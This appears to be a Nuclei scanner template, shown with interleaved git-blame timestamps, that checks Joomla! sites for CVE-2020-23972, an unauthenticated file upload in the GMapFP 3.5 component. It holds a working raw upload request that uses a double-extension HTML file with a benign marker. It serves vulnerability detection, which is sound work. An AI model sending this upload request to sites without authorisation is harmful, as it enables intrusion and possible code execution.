2021-01-02 04:56:15 +00:00
id : CVE-2020-23972
2020-12-01 09:25:33 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Joomla! Component GMapFP 3.5 - Arbitrary File Upload
2020-12-01 09:25:33 +00:00
author : dwisiswant0
severity : high
description : |
2022-07-26 13:45:11 +00:00
Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49129
2022-05-17 09:18:12 +00:00
- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-23972
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-23972
cwe-id : CWE-434
2024-01-14 13:49:27 +00:00
epss-score : 0.5953
epss-percentile : 0.97461
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : gmapfp
product : gmapfp
2023-09-06 12:22:36 +00:00
framework : joomla\!
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
2023-07-20 07:43:09 +00:00
variables :
name : "{{to_lower(rand_text_alpha(5))}}"
2023-04-27 04:28:59 +00:00
http :
2021-08-22 18:09:33 +00:00
- raw :
2020-12-01 09:25:33 +00:00
- |
2022-04-29 05:04:34 +00:00
POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
2020-12-01 09:25:33 +00:00
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer : {{BaseURL}}
Connection : close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition : form-data; name="option"
com_gmapfp
------WebKitFormBoundarySHHbUsfCoxlX1bpS
2023-07-20 07:43:09 +00:00
Content-Disposition : form-data; name="image1"; filename="{{name}}.html.gif"
2020-12-01 09:25:33 +00:00
Content-Type : text/html
projectdiscovery
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition : form-data; name="no_html"
no_html
------WebKitFormBoundarySHHbUsfCoxlX1bpS--
2021-08-22 18:09:33 +00:00
payloads :
component :
- "com_gmapfp"
- "comgmapfp"
2020-12-01 09:25:33 +00:00
extractors :
- type : regex
regex :
2022-04-29 05:04:34 +00:00
- "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
2023-07-11 19:49:27 +00:00
part : body
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022004587c81c7e82c9490e02aacd8880f4a0133941d0c8b069f58503062204050cb022100884c2637702b029c7bdcd70b453a3a0c48b94b06fc28fd98fb9243b1d7127e34:922c64590222798bb761d5b6d8e72950